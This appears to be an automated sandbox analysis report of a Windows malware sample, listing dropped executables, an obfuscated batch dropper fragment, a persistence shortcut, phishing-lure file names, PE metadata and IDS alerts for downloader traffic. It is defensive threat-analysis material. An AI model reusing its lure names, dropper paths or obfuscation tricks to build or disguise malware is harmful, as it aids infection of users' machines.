SHA1:	5537ED245EE64F9F28F5E7D47CA282B6D193EDEC
SHA-256:	6B1045357EBF002C11638B1A3F371D6E3F6E6DB433FBC441307F99B8E350D3A9
SHA-512:	ED383D3CDE666B63FE17BA005CA2EB0AFE1BD1BBAD7631CA977E33328B6DA70DAAF7D37C0C51BA1694FFC14A73FA12C65FB5121AAFEE98647304FD0E1F739DF5
Malicious:	true
Preview:	...Y#..K'"."......"."&.'.#....%..&. #."&..&.............".'#......."......Y#..K.".&..........Y#..KK............K.............NV...............Z..............KZ..............W......}......V.............Z..............Z..............W..............N..............K.............Z...........................N.............KW............}Z.......}.....................................W...............U...................................}.......V............US..............M..........................V...............S.............MU..........................................".MMR.......\|...........S...U.V..~~...+P.KU....N.LLW.Q....\|...$....\|.......".K.L+..M..........~..!QT.VUS".&#.L....&.NKK.V'....L...\|.................%...#.ZNO.LX&"UWOPP........~..."..+ . ...NT..N.................Q...V..SROOX..%%OVN..).V..QL.M.".U.OR........\|.\|...$TY.[..L..............%.Z!NYT.+....%...~........'....%"..R..M.S.N..........L...P.SM.~~...............PW....NNV.}Z...OO...&.&.T..Y

C:\Users\Public\Libraries\Pumyophn.PIF

Download File

Process:	C:\Users\user\Desktop\image.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2143232
Entropy (8bit):	7.486458111867687
Encrypted:	false
SSDEEP:	49152:gdqswGco/j1HEFW1bB9HI8QrwiycY5vtxqpGAGco/j1HEFW1bB9HI8QrwiycY5vu:g8swjWdbwjWdb
MD5:	4F481037138109F314141B4FEDE21F87
SHA1:	E28504F330D3D8586D36E3FF270FDFC0821E0CC2
SHA-256:	F65D5F51C5B69891D73C3799B4ED4D53FEA665A6EF5B3D0CCE8CAE1E96C0E785
SHA-512:	4E30BA43E8C8F5BB4810C4AC7A8F6BDFDD40C8A6B0DE97B0F114AC1F6D326493BEFA8621941B178ECE263DA16F5081F93B6FB09A030670DF54658F42CD866EC4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 16%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B............................8.......@....@..........................@!..................@...........................@...%.......>.......................l...................................................G...............................text............ .................. ..`.itext..T....0.......$.............. ..`.data... ....@......................@....bss.....6...............................idata...%...@...&..................@....tls....4....p...........................rdata..............................@..@.reloc...l.......n..................@..B.rsrc....>.......>...v..............@..@.............@!....... .............@..@................................................................................................

C:\Users\Public\Libraries\nhpoymuP.pif

Download File

Process:	C:\Users\user\Desktop\image.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	175800
Entropy (8bit):	6.631791793070417
Encrypted:	false
SSDEEP:	3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
MD5:	22331ABCC9472CC9DC6F37FAF333AA2C
SHA1:	2A001C30BA79A19CEAF6A09C3567C70311760AA4
SHA-256:	BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
SHA-512:	C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: PO_KB#67897.cmd, Detection: malicious, Browse Filename: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Detection: malicious, Browse Filename: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Detection: malicious, Browse Filename: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Detection: malicious, Browse Filename: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, Detection: malicious, Browse Filename: F.O Pump Istek,Docx.bat, Detection: malicious, Browse Filename: D.G Governor Istek,Docx.exe, Detection: malicious, Browse Filename: qDKTsL1y44.exe, Detection: malicious, Browse Filename: PRODUCT.bat, Detection: malicious, Browse Filename: purchaseorder.bat, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............\|..8...,...@...@..@

C:\Users\Public\Pumyophn.url

Download File

Process:	C:\Users\user\Desktop\image.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Pumyophn.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	5.113807690345954
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMcO11sjSsbxvWXAn:HRYFVmTWDyzG1sjSExNn
MD5:	086B55A3EA62B51C9AEA3B39563BA32F
SHA1:	36B17F81008B2A6E00FFB28297423635D31A48EA
SHA-256:	55FD91784631B17DC3037AFD4B5F84483E8D011B06C5E3B9EB2716B186B7F099
SHA-512:	F5A6087F6CCE6DC035FC08CFFF5A0A67C38BC32597E2FC6EB0BBB32A8663B52D9E2B6DF8A34E15B0010565364A6F597F73AC939D2363EB281F38142C05A14F26
Malicious:	true
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Pumyophn.PIF"..IconIndex=979466..HotKey=90..

C:\Users\Public\PumyophnF.cmd

Download File

Process:	C:\Users\user\Desktop\image.exe
File Type:	DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15789
Entropy (8bit):	4.658965888116939
Encrypted:	false
SSDEEP:	384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
MD5:	CCE3C4AEE8C122DD8C44E64BD7884D83
SHA1:	C555C812A9145E2CBC66C7C64BA754B0C7528D6D
SHA-256:	4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
SHA-512:	EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
Malicious:	false
Preview:	.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nhpoymuP.pif.log

Download File

Process:	C:\Users\Public\Libraries\nhpoymuP.pif
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1128
Entropy (8bit):	5.352137456245207
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ke84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze41qE4j:MIHK5HKeviYHKh3oPtHo6hAHKze41qHj
MD5:	C3F086C417482CFF672BDB6FE1073D36
SHA1:	0FC348E65FA3FEDD460D9AD2AAE4502D8AF56CA3
SHA-256:	3365A38477C65D42A024EE5DCC696F45EB79186E9A1B0C4CC00BBF828C408779
SHA-512:	4485A5C0C0619CCF2292A3619F45F8A06F5E6AB0FDACF27989606C6058EF020C28E38316773A19393C09DF1B2EEFA0E7005BA98B6C54A300DC4A65CDBA522A01
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.486458111867687
TrID:	Win32 Executable (generic) a (10002005/4) 99.81% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	image.exe
File size:	2'143'232 bytes
MD5:	4f481037138109f314141b4fede21f87
SHA1:	e28504f330d3d8586d36e3ff270fdfc0821e0cc2
SHA256:	f65d5f51c5b69891d73c3799b4ed4d53fea665a6ef5b3d0cce8cae1e96c0e785
SHA512:	4e30ba43e8c8f5bb4810c4ac7a8f6bdfdd40c8a6b0de97b0f114ac1f6d326493befa8621941b178ece263da16f5081f93b6fb09a030670df54658f42cd866ec4
SSDEEP:	49152:gdqswGco/j1HEFW1bB9HI8QrwiycY5vtxqpGAGco/j1HEFW1bB9HI8QrwiycY5vu:g8swjWdbwjWdb
TLSH:	A9A5D073EA60F0B4EDBA37FC48075298D55D3E355ED7B8BE22DDAA4427207123868346
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	fdfdffffffffff7f

Static PE Info

General

Entrypoint:	0x46380c
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	c1249b2dc81238026e760db6b73b768c

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 00462D44h
call 00007F59D0DD8E7Dh
mov eax, dword ptr [0052EF7Ch]
mov eax, dword ptr [eax]
call 00007F59D0E2637Dh
mov ecx, dword ptr [0052ED90h]
mov eax, dword ptr [0052EF7Ch]
mov eax, dword ptr [eax]
mov edx, dword ptr [004628E4h]
call 00007F59D0E2637Dh
mov eax, dword ptr [0052EF7Ch]
mov eax, dword ptr [eax]
call 00007F59D0E263F1h
call 00007F59D0DD6C60h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x134000	0x25ac	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x140000	0xd3e00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x139000	0x6cd8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x138000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x13471c	0x5dc	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x61fe4	0x62000	54bccdfb230aecbacc5dc4836bb40e62	False	0.5120401187818877	data	6.547957158295364	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x63000	0x854	0xa00	f9a41c84e5fdd4f1ee3395fb29f42e84	False	0.523828125	data	5.584231542920759	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x64000	0xcb120	0xcb200	32f5488777573715b7c26ec0cc7df7fb	False	0.6564915865384615	data	7.464477581988218	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x130000	0x369c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x134000	0x25ac	0x2600	902f126de362c99ae2b20adf830938cb	False	0.31938733552631576	data	5.045673551358589	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x137000	0x34	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x138000	0x18	0x200	4b2adcf7cfdd802a95428d44a20a5f89	False	0.05078125	data	0.2108262677871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x139000	0x6cd8	0x6e00	0278e681effa7fbcc52ec0b51ce696ab	False	0.6368607954545454	data	6.6913122302764805	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x140000	0xd3e00	0xd3e00	acf9e742f5c7671d790275c5e760a257	False	0.6424145003687316	data	7.464353329802556	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x140b88	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x140cbc	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x140df0	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x140f24	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x141058	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x14118c	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x1412c0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_BITMAP	0x1413f4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x1415c4	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	English	United States	0.46487603305785125
RT_BITMAP	0x1417a8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x141978	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39870689655172414
RT_BITMAP	0x141b48	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.4245689655172414
RT_BITMAP	0x141d18	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5021551724137931
RT_BITMAP	0x141ee8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5064655172413793
RT_BITMAP	0x1420b8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x142288	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5344827586206896
RT_BITMAP	0x142458	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x142628	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	English	United States	0.4870689655172414
RT_ICON	0x142710	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 1889 x 1889 px/m			0.4104609929078014
RT_ICON	0x142b78	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 1889 x 1889 px/m			0.2815573770491803
RT_ICON	0x143500	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 1889 x 1889 px/m			0.20567542213883677
RT_ICON	0x1445a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m			0.14844398340248963
RT_ICON	0x146b50	0x15ef	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9403383793410508
RT_DIALOG	0x148140	0x52	data			0.7682926829268293
RT_DIALOG	0x148194	0x52	data			0.7560975609756098
RT_STRING	0x1481e8	0x29c	data			0.4505988023952096
RT_STRING	0x148484	0x2b4	data			0.476878612716763
RT_STRING	0x148738	0xb4	data			0.6888888888888889
RT_STRING	0x1487ec	0xe8	data			0.6422413793103449
RT_STRING	0x1488d4	0x2a8	data			0.4764705882352941
RT_STRING	0x148b7c	0x3e8	data			0.382
RT_STRING	0x148f64	0x370	data			0.4022727272727273
RT_STRING	0x1492d4	0x3cc	data			0.33539094650205764
RT_STRING	0x1496a0	0x214	data			0.49624060150375937
RT_STRING	0x1498b4	0xcc	data			0.6274509803921569
RT_STRING	0x149980	0x194	data			0.5643564356435643
RT_STRING	0x149b14	0x3c4	data			0.3288381742738589
RT_STRING	0x149ed8	0x338	data			0.42961165048543687
RT_STRING	0x14a210	0x294	data			0.42424242424242425
RT_RCDATA	0x14a4a4	0x10	data			1.5
RT_RCDATA	0x14a4b4	0x368	data			0.7029816513761468
RT_RCDATA	0x14a81c	0xc9301	GIF image data, version 89a, 384 x 288	English	United States	0.6578109736489234
RT_RCDATA	0x213b20	0x188	Delphi compiled form 'TMainForm'			0.7168367346938775
RT_GROUP_CURSOR	0x213ca8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x213cbc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x213cd0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x213ce4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x213cf8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x213d0c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x213d20	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x213d34	0x4c	data			0.8289473684210527

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll	GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll	CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
oleaut32.dll	CreateErrorInfo, GetErrorInfo, SetErrorInfo, SysFreeString
ole32.dll	CoCreateInstance, CoUninitialize, CoInitialize
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll	_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-02T16:04:58.793329+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	23.237.26.135	443	TCP
2025-01-02T16:05:28.208759+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49733	193.122.130.0	80	TCP
2025-01-02T16:05:31.036881+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49733	193.122.130.0	80	TCP
2025-01-02T16:05:31.634624+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49742	188.114.97.3	443	TCP
2025-01-02T16:05:31.911893+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49740	193.122.130.0	80	TCP
2025-01-02T16:05:33.193132+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49743	193.122.130.0	80	TCP
2025-01-02T16:05:36.043613+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49740	193.122.130.0	80	TCP
2025-01-02T16:05:36.990025+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49740	193.122.130.0	80	TCP
2025-01-02T16:05:37.149920+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49747	188.114.97.3	443	TCP
2025-01-02T16:05:37.602602+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49748	188.114.97.3	443	TCP
2025-01-02T16:05:38.990029+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49750	193.122.130.0	80	TCP
2025-01-02T16:05:39.157162+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49751	188.114.97.3	443	TCP
